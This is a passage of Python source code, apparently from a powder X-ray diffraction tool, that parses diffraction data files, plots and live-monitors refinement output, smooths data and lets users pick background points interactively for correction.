None\n\n ticks = read_data(path, usecols=(col,), append_zeros=True, is_ticks=True)\n return ticks\n\n\ndef get_correlation_matrix(f, topas=False):\n names = []\n lst_not_iprm = []\n\n def yield_corrmat(f):\n for i, line in enumerate(f):\n # calculate shift to correct for topas formatting\n shift = max(0, int(math.log10(i+1))-1)\n if line.startswith('}'):\n raise StopIteration\n else:\n if not line.startswith('iprm'):\n lst_not_iprm.append(i)\n names.append(line[0:21].strip())\n yield line[26+shift:]\n\n for line in f:\n if line.startswith('C_matrix_normalized'):\n next(f)\n next(f)\n\n print('Ignoring reflection intensities (iprm***), because they are always correlated.')\n corr = np.genfromtxt(yield_corrmat(f), delimiter=4)\n corr = corr[lst_not_iprm, :][:, lst_not_iprm]\n\n return corr, names\n\n f.seek(0)\n return np.loadtxt(f), names\n\n\ndef parse_xrdml(fn):\n \"\"\"Very basic function to read panalytical XPERT PRO files (XML)\n Only parses file to get intensities and data range\"\"\"\n\n from xml.dom import minidom\n xmldoc = minidom.parse(fn)\n\n counts = xmldoc.getElementsByTagName('intensities')[0] # grab element\n # get first node + convert to float\n counts = list(map(float, counts.firstChild.wholeText.split()))\n\n for rangenode in xmldoc.getElementsByTagName('positions'):\n if rangenode.getAttribute('axis') == '2Theta':\n break\n else:\n rangenode = None\n if not rangenode:\n raise OSError(\"Cannot find range node in xrdml file.\")\n\n r_min = float(rangenode.getElementsByTagName(\n 'startPosition')[0].firstChild.wholeText)\n r_max = float(rangenode.getElementsByTagName(\n 'endPosition')[0].firstChild.wholeText)\n steps = len(counts)\n\n th2 = np.linspace(r_min, r_max, steps)\n\n xy = np.vstack([th2, counts]).T\n\n d = Data(xy, name=fn)\n\n root, ext = os.path.splitext(fn)\n new = root+'.xy'\n if not os.path.isfile(new):\n d.print_pattern(name=new)\n\n return d\n\n\ndef parse_iza_code(code):\n \"\"\"Takes IZA code and returns path to cif\"\"\"\n\n fn = code.upper()+'0.cif'\n path = os.path.join(LINESDIR, 'zeolite_database', fn)\n\n print(f'Framework code {code} -> {path}')\n print()\n\n return path\n\n\ndef run_cif2xy(cif, wl=1.0):\n raise DeprecationWarning(\n (\"This feature has been deprecated, sorry. \"\n \"The CIF library no longer works for Python 3.\"))\n \n import subprocess as sp\n\n sp.call([sys.executable, os.path.join(os.path.dirname(\n os.path.abspath(__file__)), \"cif2xy.py\"), f\"--wavelength={wl}\", cif])\n root, ext = os.path.splitext(cif)\n basename = os.path.basename(root)\n return basename+\".xy\"\n\n\ndef parse_xrs(f, return_as='d_xrs'):\n # xy = np.array([], dtype=float).reshape(0, 2)\n start = True\n pre = []\n post = []\n\n x = []\n y = []\n esd = []\n\n for line in f:\n if 'finish' in line.lower() or 'end' in line.lower():\n # Takes care of new xrs files with no bgvalu commands\n start = False\n post.append(line)\n elif line.lower().startswith('bgvalu') and start:\n inp = line.split()\n x.append(float(inp[1]))\n y.append(float(inp[2]))\n try:\n esd.append(float(inp[3]))\n except IndexError:\n esd.append(np.nan)\n elif start:\n pre.append(line)\n elif not start:\n post.append(line)\n\n f.close()\n\n if return_as == 'xye':\n return np.vstack([x, y, esd]).T\n elif return_as == 'xy':\n return np.vstack([x, y]).T\n elif return_as == 'd':\n xye = np.vstack([x, y, esd]).T\n d = Data(xye, name='stepco.inp')\n return d\n elif return_as == 'd_xrs': # include xrs stepco input data\n xye = np.vstack([x, y, esd]).T\n d = Data(xye, name='stepco.inp')\n xrs = [f.name, pre, post]\n return d, xrs\n else:\n raise SyntaxError\n\n\ndef parse_crplot_dat(f):\n \"\"\"Parses crplot.dat file\"\"\"\n\n # skip first 2 lines\n next(f)\n next(f)\n\n ret = []\n\n for line in f:\n inp = line.split()\n if not f:\n continue\n ret.append([float(val) for val in inp])\n\n return ret\n\n\ndef parse_hkl_dat(f):\n ret = []\n\n for line in f:\n inp = line.split()\n if not f:\n continue\n if len(inp) < 4:\n inp = (line[0:3], line[3:6], line[6:9], line[9:])\n else:\n ret.append([float(val) for val in inp])\n\n return ret\n\n\ndef plot_stdin(fig, update_time=0.2):\n import time\n TclError = matplotlib.backends.backend_tkagg.tkagg.Tk._tkinter.TclError\n\n print('Reading stdin.\\n')\n\n def nrange(n=0):\n while True:\n yield n\n n = n+1\n\n iterator = (n for n in nrange())\n\n # fig = plt.figure()\n ax = fig.add_subplot(111)\n\n x = []\n y = []\n\n l1, = ax.plot(x, y, label='stdin')\n\n plt.legend()\n fig.show()\n\n t0 = time.time()\n\n while True:\n try:\n line = sys.stdin.readline()\n except KeyboardInterrupt as e:\n print(e)\n break\n\n if line == '':\n try:\n # update figure to prevent slow responsiveness\n fig.canvas.flush_events()\n except TclError:\n print('-- Window closed (TclError on readline).')\n break\n\n try:\n time.sleep(0.05) # prevent high cpu usage\n except KeyboardInterrupt as e:\n print(e)\n break\n else:\n continue\n\n inp = line.split()\n\n try:\n y.append(float(inp[1]))\n x.append(float(inp[0]))\n except IndexError:\n x.append(next(iterator))\n y.append(float(inp[0]))\n\n if time.time() - t0 > update_time:\n # drawing is slow, better to refresh ever x seconds\n\n t0 = time.time()\n\n l1.set_xdata(x)\n l1.set_ydata(y)\n\n ax.relim()\n ax.autoscale()\n\n plt.draw()\n\n try:\n # update figure to prevent slow responsiveness\n fig.canvas.flush_events()\n except TclError:\n print('-- Window closed (TclError on update).')\n break\n\n\ndef f_monitor(fin, f_init, f_update, fig=None, poll_time=0.05):\n \"\"\"experimental function for live monitoring of plots\"\"\"\n import time\n\n TclError = matplotlib.backends.backend_tkagg.tkagg.Tk._tkinter.TclError\n\n if not fig:\n fig = plt.figure()\n\n ax = fig.add_subplot(111)\n\n while True:\n try:\n args = f_init(fin, fig, ax)\n except OSError:\n time.sleep(1)\n else:\n break\n\n plt.legend()\n fig.show()\n\n current_lastmod = os.stat(fin).st_mtime\n\n while True:\n try:\n mtime = os.stat(fin).st_mtime\n except OSError:\n time.sleep(1)\n continue\n\n if mtime == current_lastmod:\n # flushing here as well, to prevent locking up of mpl window\n\n try:\n fig.canvas.flush_events()\n except TclError:\n print('-- Window closed (TclError).')\n break\n\n # low poll time is needed to keep responsiveness\n\n try:\n time.sleep(poll_time)\n except KeyboardInterrupt as e:\n print(e)\n break\n\n else:\n print(f'Updated: {fin} -', time.ctime(os.stat(fin).st_mtime))\n current_lastmod = os.stat(fin).st_mtime\n time.sleep(0.2)\n args = f_update(fin, *args)\n\n # ax.relim()\n # ax.autoscale() # resets the boundaries -> annoying for a plot\n # that doesn't need rescaling\n plt.draw()\n\n # And this allows you to at least close the window (and crash the\n # program by that ;))\n fig.canvas.flush_events()\n\n\ndef plot_init(fn, fig, ax):\n # f = read_file(fn)\n d = read_data(fn)\n\n if fn in ('fcalc_fou.xy', 'fobs_fou.xy', 'fcfo.out'):\n try:\n root, ext = os.path.splitext(fn)\n xl, yl = root.split('_')\n except ValueError:\n xl = 'Fobs'\n yl = 'Fcalc'\n\n ax.set_xlabel(xl)\n ax.set_ylabel(yl)\n ax.set_title(fn)\n line, = ax.plot(\n d.x, d.y, 'o', label=f'{xl} vs {yl}', color='r', linestyle='')\n diag, = ax.plot(\n [0, 25], [0, 25], color='b', linestyle='-', linewidth=2)\n return [line, diag]\n else:\n line, = ax.plot(d.x, d.y, label=fn)\n return [line]\n\n\ndef plot_update(fn, *args):\n # f = read_file(fn)\n d = read_data(fn)\n\n if fn in ('fcalc_fou.xy', 'fobs_fou.xy', 'fcfo.out'):\n [line, diag] = args\n line.set_data(d.x, d.y)\n diag.set_data([0, 25], [0, 25])\n return [line, diag]\n else:\n [line] = args\n line.set_data(d.x, d.y)\n return [line]\n\n\ndef crplot_init(fin, fig, ax):\n\n fcr = open('crplot.dat')\n fhkl = open('hkl.dat')\n\n crdata = np.array(parse_crplot_dat(fcr))\n hkldata = np.array(parse_hkl_dat(fhkl))\n\n fcr.close()\n fhkl.close()\n\n tt = crdata[:, 0]\n obs = crdata[:, 1]\n clc = crdata[:, 2]\n dif = crdata[:, 3]\n\n tck = hkldata[:, 3]\n\n mx_dif = max(dif)\n\n pobs, = ax.plot(tt, obs, label='observed', c='green')\n pclc, = ax.plot(tt, clc, label='calculated', c='red')\n pdif, = ax.plot(tt, dif - mx_dif, label='difference', c='blue')\n\n pobs_zero, = ax.plot(tt, np.zeros(tt.size), c='black')\n pdif_zero, = ax.plot(tt, np.zeros(tt.size) - mx_dif, c='black')\n\n ptcks, = ax.plot(tck, np.zeros(tck.size) - (mx_dif / 4),\n linestyle='', marker='|', markersize=10, label='ticks', c='purple')\n\n args = [pobs, pclc, pdif, pobs_zero, pdif_zero, ptcks]\n\n return args\n\n\ndef crplot_update(fin, *args):\n pobs, pclc, pdif, pobs_zero, pdif_zero, ptcks = args\n\n fcr = open('crplot.dat')\n fhkl = open('hkl.dat')\n\n crdata = np.array(parse_crplot_dat(fcr))\n hkldata = np.array(parse_hkl_dat(fhkl))\n\n fcr.close()\n fhkl.close()\n\n tt = crdata[:, 0]\n obs = crdata[:, 1]\n clc = crdata[:, 2]\n dif = crdata[:, 3]\n\n tck = hkldata[:, 3]\n\n mx_dif = max(dif)\n\n pobs.set_data(tt, obs)\n pclc.set_data(tt, clc)\n pdif.set_data(tt, dif - mx_dif)\n pobs_zero.set_data(tt, np.zeros(tt.size))\n pdif_zero.set_data(tt, np.zeros(tt.size) - mx_dif)\n ptcks.set_data(tck, np.zeros(tck.size) - (mx_dif / 4))\n\n args = [pobs, pclc, pdif, pobs_zero, pdif_zero, ptcks]\n\n return args\n\n\ndef f_crplo():\n # difference data\n crplotdat = 'crplot.dat'\n fcr = open(crplotdat)\n\n crdata = np.array(parse_crplot_dat(fcr))\n\n tt = crdata[:, 0]\n obs = crdata[:, 1]\n clc = crdata[:, 2]\n dif = crdata[:, 3]\n\n mx_dif = max(dif)\n\n plt.plot(tt, obs, label='observed')\n plt.plot(tt, clc, label='calculated')\n plt.plot(tt, dif - mx_dif, label='difference')\n\n plt.plot(tt, np.zeros(tt.size), c='black')\n plt.plot(tt, np.zeros(tt.size) - mx_dif, c='black')\n\n # tick marks\n hkldat = 'hkl.dat'\n try:\n fhkl = open(hkldat)\n except OSError:\n print('-- hkl.dat not found. (IOError)')\n else:\n hkldata = np.array(parse_hkl_dat(fhkl))\n tck = hkldata[:, 3]\n plt.plot(tck, np.zeros(tck.size) - (mx_dif / 4), linestyle='',\n marker='|', markersize=10, label='ticks', c='purple')\n\n\ndef f_prf(fin):\n fin = open(fin)\n\n for i in range(6):\n next(fin)\n\n tt, fobs, fcal, diff = np.genfromtxt(\n fin, usecols=(0, 1, 2, 3), unpack=True)\n\n mx_diff = max(diff)\n\n plt.plot(tt, fobs, label='observed')\n plt.plot(tt, fcal, label='calculated')\n plt.plot(tt, diff-mx_diff, label='difference')\n\n plt.plot(tt, np.zeros(tt.size), c='black')\n plt.plot(tt, np.zeros(tt.size) + (diff[0] - mx_diff), c='black')\n\n\ndef f_prf_init(fin, fig, ax):\n fin = open(fin)\n\n for i in range(6):\n next(fin)\n\n tt, fobs, fcal, diff = np.genfromtxt(\n fin, usecols=(0, 1, 2, 3), unpack=True)\n\n mx_diff = max(diff)\n\n pfobs, = ax.plot(tt, fobs, label='observed')\n pfcal, = ax.plot(tt, fcal, label='calculated')\n pdiff, = ax.plot(tt, diff-mx_diff, label='difference')\n\n pzero_fobs, = ax.plot(tt, np.zeros(tt.size), c='black')\n pzero_diff, = ax.plot(\n tt, np.zeros(tt.size) + (diff[0] - mx_diff), c='black')\n\n args = [pfobs, pfcal, pdiff, pzero_fobs, pzero_diff]\n return args\n\n\ndef f_prf_update(fin, *args):\n pfobs, pfcal, pdiff, pzero_fobs, pzero_diff = args\n\n fin = open(fin)\n\n for i in range(6):\n next(fin)\n\n tt, fobs, fcal, diff = np.genfromtxt(\n fin, usecols=(0, 1, 2, 3), unpack=True)\n\n mx_diff = max(diff)\n\n pfobs.set_data(tt, fobs)\n pfcal.set_data(tt, fcal)\n pdiff.set_data(tt, diff-mx_diff)\n pzero_fobs.set_data(tt, np.zeros(tt.size))\n pzero_diff.set_data(tt, np.zeros(tt.size) + (diff[0] - mx_diff))\n\n args = [pfobs, pfcal, pdiff, pzero_fobs, pzero_diff]\n return args\n\n\ndef f_plot_stepco_special(bg_xy):\n \"\"\"Specialised function for plotting XRS output, that takes an XRS data file (crplo.dat)\n and adds the background to the difference in order to make fine adjustments to the background\"\"\"\n\n crplotdat = 'crplot.dat'\n try:\n fcr = open(crplotdat)\n except OSError:\n print(f'\\n{crplotdat} not found. Skipping difference plot.')\n else:\n crdata = np.array(parse_crplot_dat(fcr))\n tt = crdata[:, 0]\n dif = crdata[:, 3]\n\n bg_interpolate = interpolate(bg_xy, tt, kind='linear')\n\n plt.plot(tt, bg_interpolate + dif, label='bg + diff')\n\n\ndef f_plot_topas_special(xyobs, xycalc, xydiff, xybg, lw=1.0):\n \"\"\"Special function that takes observed, calculated and difference plot and adds it to the background.\n This is useful to compare the difference and adjust the background accordingly\"\"\"\n\n if not xybg:\n raise OSError(\n \" ** Background data not found. Please specify with --bgin\")\n\n tt = xyobs.x\n\n bg_interpolate = interpolate(xybg.xy, tt, kind='linear')\n\n plt.plot(tt, xycalc.y + bg_interpolate, label='ycalc', lw=lw)\n # plt.plot(tt, xyobs.y + bg_interpolate, label='yobs')\n\n plt.plot(tt, bg_interpolate + xydiff.y, label='bg + diff', lw=lw)\n plt.plot(tt, bg_interpolate, label='bg', lw=lw)\n\n\ndef f_plot_weighted_difference(xyobs, xycalc, xyerr, lw=1.0):\n \"\"\"Special function to calculate and display the weighted difference plot\n For more information see: Young, 'The Rietveld Method', 1993, p24-25\"\"\"\n\n assert xyobs.xy.shape == xycalc.xy.shape == xyerr.xy.shape, \"Arrays xyobs, xycalc, and xyerr are of different shape!\"\n\n offset = -20\n\n wdiff = (((xyobs.y-xycalc.y) / (xyobs.y + min(xyobs.y)+1)) / xyerr.y)\n wdiff2 = ((xyobs.y-xycalc.y) / xyerr.y)\n plt.plot(xyobs.x, wdiff+offset, label=\"weighted difference\", lw=lw)\n plt.plot((min(xyobs.x), max(xyobs.x)), (offset, offset), c='black')\n\n plt.plot(xyobs.x, wdiff2+offset*2, label=\"weighted difference 2\", lw=lw)\n\n # plt.plot(xyobs.x, xyobs.y-xycalc.y+offset*2, label=\"difference\")\n\n plt.plot(xyobs.x, xyerr.y+offset*3, label=\"error\")\n\n\ndef f_bg_correct_out(d, bg_xy, kind='linear', offset='ask', suffix_bg='_bg', suffix_corr='_corr'):\n \"\"\"Function that removes the background from a data set and prints it to a new file\"\"\"\n\n root, ext = os.path.splitext(d.filename)\n fn_bg = root+suffix_bg+ext\n fn_corr = root+suffix_corr+ext\n\n # fn_bg = d.filename.replace('.','_bg.')\n # fn_corr = d.filename.replace('.','_corr.')\n\n out_bg = open(fn_bg, 'w')\n out_corr = open(fn_corr, 'w')\n\n xvals = d.x\n yvals = d.y\n\n bg_yvals = interpolate(bg_xy, xvals, kind=kind)\n\n if offset == 'ask':\n offset = input(\n \"What y offset should I add to the data? (x=exit)\\n >> [0] \") or 0\n offset = int(offset)\n\n if offset == 'x':\n return\n\n print(f'\\nOffset = {offset}')\n\n if len(bg_xy) >= 4:\n print('Writing background pattern to %s' % fn_bg)\n for x, y in zip(xvals, bg_yvals):\n if np.isnan(y):\n continue\n print('{:15.6f}{:15.6f}'.format(x, y), file=out_bg)\n print('Writing corrected pattern to %s' % fn_corr)\n\n if d.has_esd:\n err = d.err\n\n for x, y, e in zip(xvals, yvals-bg_yvals+offset, err):\n if np.isnan(y):\n continue\n print('{:15.6f}{:15.6f}{:15.6f}'.format(x, y, e), file=out_corr)\n else:\n for x, y in zip(xvals, yvals-bg_yvals+offset):\n if np.isnan(y):\n continue\n print('{:15.6f}{:15.6f}'.format(x, y), file=out_corr)\n else:\n raise IndexError(\n 'Not enough values in background array, need at least 4 points.')\n\n\ndef new_stepco_inp(xy, name, pre, post, esds=None):\n \"\"\"Function for writing stepco input files\"\"\"\n\n print(f'Writing xy data to file {name}')\n\n f = open(name, 'w')\n\n for line in pre:\n print(line, end=' ', file=f)\n\n if np.any(esds):\n esds = esds.reshape(1, -1)\n\n for (x, y, esd) in np.vstack((xy, esds)).T:\n if np.isnan(esd):\n esd = ''\n else:\n esd = f'{esd:15.6f}'\n print(f'BGVALU {x:15f}{y:15.6f}{esd}', file=f)\n else:\n for x, y in xy.T:\n print(f'BGVALU {x:15f}{y:15.6f}', file=f)\n\n for line in post:\n print(line, end=' ', file=f)\n\n f.close()\n\n\ndef interpolate(arr, xvals, kind='cubic'):\n \"\"\"\n arr is the data set to interpolate, can be ndim=2 array, or tuple/list of x/y values\n\n xvals are the values it has to be interpolated to\n\n kind is the type of correction, Valid options: 'linear','nearest','zero',\n 'slinear', 'quadratic, 'cubic') or as an integer specifying the order\n of the spline interpolator to use.\n \"\"\"\n\n try:\n arr.ndim\n except AttributeError:\n x, y = arr\n else:\n assert arr.ndim == 2, 'Expected 2 dimensional array'\n x = arr[:, 0] # create views\n y = arr[:, 1] #\n\n try:\n kind = int(kind)\n except ValueError:\n if x.shape[0] < 4:\n kind = 'linear'\n else:\n if x.shape[0] < kind+1:\n kind = 'linear'\n\n res = interp1d(x, y, kind=kind, bounds_error=False)\n\n # if the background seems to take shortcuts in linear mode, this is because fixed steps\n # were set in the Backgrounder class\n\n return res(xvals)\n\n\ndef smooth(x, window_len=11, window='hanning'):\n \"\"\"smooth the data using a window with requested size.\n\n This method is based on the convolution of a scaled window with the signal.\n The signal is prepared by introducing reflected copies of the signal \n (with the window size) in both ends so that transient parts are minimized\n in the begining and end part of the output signal.\n\n input:\n x: the input signal\n window_len: the dimension of the smoothing window; should be an odd integer\n window: the type of window from 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\n flat window will produce a moving average smoothing.\n\n output:\n the smoothed signal\n\n example:\n\n t=linspace(-2,2,0.1)\n x=sin(t)+randn(len(t))*0.1\n y=smooth(x)\n\n see also:\n\n numpy.hanning, numpy.hamming, numpy.bartlett, numpy.blackman, numpy.convolve\n scipy.signal.lfilter\n\n TODO: the window parameter could be the window itself if an array instead of a string\n\n FROM: http://www.scipy.org/Cookbook/SignalSmooth\n \"\"\"\n\n if x.ndim != 1:\n raise ValueError(\"smooth only accepts 1 dimension arrays.\")\n\n if x.size < window_len:\n raise ValueError(\"Input vector needs to be bigger than window size.\")\n\n if window_len < 3:\n return x\n\n if window not in ['flat', 'hanning', 'hamming', 'bartlett', 'blackman']:\n raise ValueError(\n \"Window is on of 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\")\n\n s = np.r_[2*x[0]-x[window_len-1::-1], x, 2*x[-1]-x[-1:-window_len:-1]]\n\n if window == 'flat': # moving average\n w = np.ones(window_len, 'd')\n else:\n w = eval('np.'+window+'(window_len)')\n\n y = np.convolve(w/w.sum(), s, mode='same')\n\n return y[window_len:-window_len+1]\n\n\ndef savitzky_golay(y, window_size=11, order=2, deriv=0):\n r\"\"\"Smooth (and optionally differentiate) data with a Savitzky-Golay filter.\n The Savitzky-Golay filter removes high frequency noise from data.\n It has the advantage of preserving the original shape and\n features of the signal better than other types of filtering\n approaches, such as moving averages techhniques.\n Parameters\n ----------\n y : array_like, shape (N,)\n the values of the time history of the signal.\n window_size : int\n the length of the window. Must be an odd integer number.\n order : int\n the order of the polynomial used in the filtering.\n Must be less then `window_size` - 1.\n deriv: int\n the order of the derivative to compute (default = 0 means only smoothing)\n Returns\n -------\n ys : ndarray, shape (N)\n the smoothed signal (or it's n-th derivative).\n Notes\n -----\n The Savitzky-Golay is a type of low-pass filter, particularly\n suited for smoothing noisy data. The main idea behind this\n approach is to make for each point a least-square fit with a\n polynomial of high order over a odd-sized window centered at\n the point.\n Examples\n --------\n t = np.linspace(-4, 4, 500)\n y = np.exp( -t**2 ) + np.random.normal(0, 0.05, t.shape)\n ysg = savitzky_golay(y, window_size=31, order=4)\n import matplotlib.pyplot as plt\n plt.plot(t, y, label='Noisy signal')\n plt.plot(t, np.exp(-t**2), 'k', lw=1.5, label='Original signal')\n plt.plot(t, ysg, 'r', label='Filtered signal')\n plt.legend()\n plt.show()\n References\n ----------\n .. [1] A. Savitzky, M. J. E. Golay, Smoothing and Differentiation of\n Data by Simplified Least Squares Procedures. Analytical\n Chemistry, 1964, 36 (8), pp 1627-1639.\n .. [2] Numerical Recipes 3rd Edition: The Art of Scientific Computing\n W.H. Press, S.A. Teukolsky, W.T. Vetterling, B.P. Flannery\n Cambridge University Press ISBN-13: 9780521880688\n\n FROM: http://www.scipy.org/Cookbook/SavitzkyGolay\n \"\"\"\n try:\n window_size = np.abs(np.int(window_size))\n order = np.abs(np.int(order))\n except ValueError:\n raise ValueError(\"window_size and order have to be of type int\")\n if window_size % 2 != 1 or window_size < 1:\n raise TypeError(\"window_size size must be a positive odd number\")\n if window_size < order + 2:\n raise TypeError(\"window_size is too small for the polynomials order\")\n order_range = list(range(order+1))\n\n half_window = (window_size - 1) // 2\n # precompute coefficients\n b = np.mat([[k**i for i in order_range]\n for k in range(-half_window, half_window+1)])\n m = np.linalg.pinv(b).A[deriv] # coefficients\n\n # pad the signal at the extremes with\n # values taken from the signal itself\n firstvals = y[0] - np.abs(y[1:half_window+1][::-1] - y[0])\n lastvals = y[-1] + np.abs(y[-half_window-1:-1][::-1] - y[-1])\n y = np.concatenate((firstvals, y, lastvals))\n return np.convolve(m, y, mode='valid')\n\n\ndef wavelength_info(wl):\n \"\"\"Little summary for given wavelength\"\"\"\n\n energy = wavelength2energy(wl)\n\n print(f\"wavelength: {wl:.5f} angstrom\")\n print(f\"energy: {energy:.5f} kev\")\n\n dvals = 10/np.linspace(1, 10, 10)\n\n theta2 = d2twotheta(dvals, wl)\n qvals = 4*(np.pi/wl) * np.sin(np.radians(theta2/2))\n\n print(\"\\n d th2 q\")\n for d, th2, q in zip(dvals, theta2, qvals):\n print(f\"{d:10.3f} {th2:10.3f} {q:10.3f}\")\n print()\n\n\ndef calc_agreement(o, c, bg=0, kind='linear'):\n \"\"\"Calculates agreement values for given data data.\"\"\"\n if np.any(bg):\n bg = interpolate(bg.T, c.x, kind=kind) # need linear or better here\n\n # nearest is fast and accurate, anything else is very slow\n oy = interpolate(o.xy, c.x, kind='nearest') - bg\n # oe = interpolate(o.xye[:,0:3:2],c.x,kind='nearest')\n\n rp = np.sum(np.abs(oy - c.y)) / np.sum(oy) # profile R-value\n\n # w = (1/oe)**2\n # rwp = ( np.sum(w*(oy - c.y)**2) / np.sum(w*(oy)**2) )**0.5 # weighted\n # profile R-value\n\n return rp\n\n\nclass Data:\n total = 0\n plot_range = None\n\n \"\"\"container class for x,y, err data\"\"\"\n\n def __init__(self, arr, name=None, quiet=False, is_ticks=False):\n if not quiet:\n print(f'Loading data: {name}\\n shape: {arr.shape}')\n\n self.is_ticks = is_ticks\n\n if self.plot_range:\n r0, r1 = self.plot_range\n self.arr = arr[np.logical_and(arr[:, 0] >= r0, arr[:, 0] <= r1)]\n else:\n self.arr = arr\n\n try:\n self.x = self.arr[:, 0]\n self.y = self.arr[:, 1]\n self.xy = self.arr[:, 0:2]\n self.xye = self.arr[:, 0:3]\n except IndexError:\n raise OSError(f\"Could not load file/data: {name}\")\n\n try:\n self.err = self.arr[:, 2]\n except IndexError:\n self.err = None\n self.has_esd = False\n else:\n if np.all(self.err == np.nan):\n self.has_esd = False\n self.err = None\n else:\n self.has_esd = True\n\n self.index = self.total\n self.filename = name\n Data.total += 1\n\n if not quiet and not is_ticks:\n n = len(self.x) # observations\n if self.has_esd:\n w = 1/self.err**2 # weights\n else:\n w = 1/(np.abs(self.y)+0.1) # weights = y^-1 if no esds\n print(f' R_exp: {((n) / np.sum(w*self.y**2))**0.5:.3%}')\n\n def bin(self, binsize=0.01):\n x = self.x\n y = self.y\n fn = self.filename\n\n print(f'Binning {fn} from 2th = {min(x)} - {max(x)} with a bin size of {binsize}')\n print()\n print('N(x) = ', x.shape)\n print('N(y) = ', y.shape)\n\n bins = np.arange(min(x), max(x), binsize)\n\n print('N(bins) =', bins.shape)\n print()\n\n digi = np.digitize(x, bins)\n\n xbinned = np.array([x[digi == i].mean() for i in range(1, len(bins))])\n ybinned = np.array([y[digi == i].mean() for i in range(1, len(bins))])\n\n xbinned.shape = (-1, 1)\n ybinned.shape = (-1, 1)\n\n root, ext = os.path.splitext(self.filename)\n name = root+'_bin_'+str(binsize)+ext\n\n if self.has_esd:\n interpolated_errors = interpolate(\n (self.x, self.err), xbinned, kind='linear')\n return Data(np.hstack((xbinned, ybinned, interpolated_errors)), name=name)\n else:\n return Data(np.hstack((xbinned, ybinned)), name=name)\n\n def smooth(self, window='savitzky_golay', window_len=7, order=3, suffix='_smooth'):\n assert window in ['flat', 'hanning', 'hamming',\n 'bartlett', 'blackman', 'savitzky_golay', 'moving_avg']\n\n print(f' >> Applying filter: {window}, window: {window_len}, order {order} (SG only) to {self.filename}')\n\n if window == 'savitzky_golay':\n y = savitzky_golay(self.y, window_size=window_len, order=order)\n else:\n y = smooth(self.y, window_len=window_len, window=window)\n\n root, ext = os.path.splitext(self.filename)\n name = root+suffix+ext\n\n x = np.copy(self.x)\n\n y.shape = (-1, 1)\n x.shape = (-1, 1)\n\n return Data(np.hstack((x, y)), name=name)\n\n def convert_wavelength(self, wavelength_in, wavelength_out):\n \"\"\"Converts 2theta values to a different wavelength\"\"\"\n print()\n print(f\" ** Convert {self.filename} from {wavelength_in:.4f} ANG ({wavelength2energy(wavelength_in):.2f} keV) to {wavelength_out:.4f} ANG ({wavelength2energy(wavelength_out):.2f} keV)\")\n print()\n d = twotheta2d(self.x, wavelength_in)\n theta2 = d2twotheta(d, wavelength_out)\n arr = self.arr\n arr[:, 0] = theta2\n return Data(arr, name=self.filename)\n\n def print_pattern(self, name=None, tag=\"\"):\n \"\"\"print self (x,y,e) to 3 column file. If no name is given, original file is overwritten.\n A tag can be added to modify the original filename instead (ie. data.xye -> data_binned.xye)\"\"\"\n\n if tag:\n tag = \"_\" + tag\n\n if not name:\n root, ext = os.path.splitext(self.filename)\n name = root + tag + ext\n np.savetxt(name, self.xye, fmt='%15.5f')\n\n print(f'Pattern written to {name}')\n\n def plot(self, ax):\n ax.plot(self.x, self.y)\n\n\nclass Background:\n sensitivity = 8\n\n def __init__(self, fig, d=None, outfunc=None, bg_correct=False, quiet=False, out=None, npick=-1, topas_bg=False, xrs=None):\n \"\"\"Class that captures mouse events when a graph has been drawn, stores the coordinates\n of these points and draws them as a line on the screen. Can also remove points and print all\n the stored points to stdout\n\n http://matplotlib.sourceforge.net/users/event_handling.html\n http://matplotlib.sourceforge.net/api/pyplot_api.html#matplotlib.pyplot.plot\n\n Takes:\n a figure object\n optional numpy array with background coordinates, shape = (2,0)\n\n xy: 2d ndarray, shape(2,0) with x,y data\"\"\"\n\n self.npick = npick\n\n self.out = out\n\n self.ax = fig.axes[0]\n self.topas_bg = topas_bg\n self.xrs = xrs\n\n if d:\n self.d = d\n self.xy = np.array(self.d.xy, copy=True).T\n else:\n self.d = None\n self.xy = None\n\n try:\n idx = self.xy[0, :].argsort()\n self.xy = self.xy[:, idx]\n except (IndexError, ValueError, TypeError):\n self.xy = np.array([], dtype=float).reshape(2, 0)\n\n self.line, = self.ax.plot(*self.xy, lw=0.5, marker='s', mec='red', mew=2,\n mfc='None', markersize=5, picker=self.sensitivity, label='interactive background')\n\n self.pick = self.line.figure.canvas.mpl_connect(\n 'pick_event', self.onpick)\n self.cid = self.line.figure.canvas.mpl_connect(\n 'button_press_event', self)\n\n self.keyevent = self.line.figure.canvas.mpl_connect(\n 'key_press_event', self.onkeypress)\n\n self.n = 0\n\n self.tb = plt.get_current_fig_manager().toolbar\n\n if self.topas_bg:\n self.last_agreement = 0\n\n print()\n print('Left mouse button: add point')\n print('Right mouse button: remove point')\n print('Middle mouse button or press \"a\": print points to file/stdout')\n print()\n print('Note: Adding/Removing points disabled while using drag/zoom functions.')\n print()\n\n self.bg_correct = bg_correct\n if self.bg_correct:\n # Set limited range to speed up calculations\n self.bg_range = np.arange(self.xy[0][0], self.xy[0][-1], 0.01)\n self.bg, = self.ax.plot(self.d.x, self.d.y, label='background')\n\n def __call__(self, event):\n \"\"\"Handles events (mouse input)\"\"\"\n # Skips events outside of canvas\n if event.inaxes != self.line.axes:\n return\n # Skips events if any of the toolbar buttons are active\n if self.tb.mode != '':\n return\n\n xdata = event.xdata\n ydata = event.ydata\n x, y = event.x, event.y\n\n button = event.button\n # print event\n\n if button == 1: # lmb\n self.add_point(x, y, xdata, ydata)\n if button == 2: # mmb\n self.printdata()\n if button == 3: # rmb\n pass\n\n if self.bg_correct and button:\n self.background_update()\n\n self.line.set_data(self.xy)\n self.line.figure.canvas.draw()\n\n if len(self.xy.T) == self.npick:\n print('\\nClosing window...')\n import time\n time.sleep(1)\n plt.close()\n\n def onpick(self, event):\n \"\"\"General data point picker, should work for all kinds of plots?\"\"\"\n if not event.mouseevent.button == 3: # button 3 = right click\n return\n\n ind = event.ind\n\n removed = self.xy[:, ind]\n self.xy = np.delete(self.xy, ind, 1)\n\n if self.topas_bg:\n agreement = calc_agreement(\n self.xyobs, self.xycalc, self.xy, kind=self.bg_correct)\n difference = agreement - self.last_agreement\n self.last_agreement = agreement\n string = f'{agreement:.4f} ({difference:+.4f})'\n else:\n string = \"\"\n\n for n in range(len(ind)):\n print(f' --- {removed[:, n][0]:.4f} {removed[:, n][1]:.4f} {string}')\n\n def onkeypress(self, event):\n if event.key == 'x':\n print('x pressed')\n if event.key == 'y':\n print('y pressed')\n if event.key == 'z':\n print('z pressed')\n if event.key == 'a':\n print('\\na pressed')\n self.printdata()\n\n def add_point(self, x, y, xdata, ydata):\n \"\"\"Store both data points as relative x,y points. The latter are needed to remove points\"\"\"\n\n self.xy 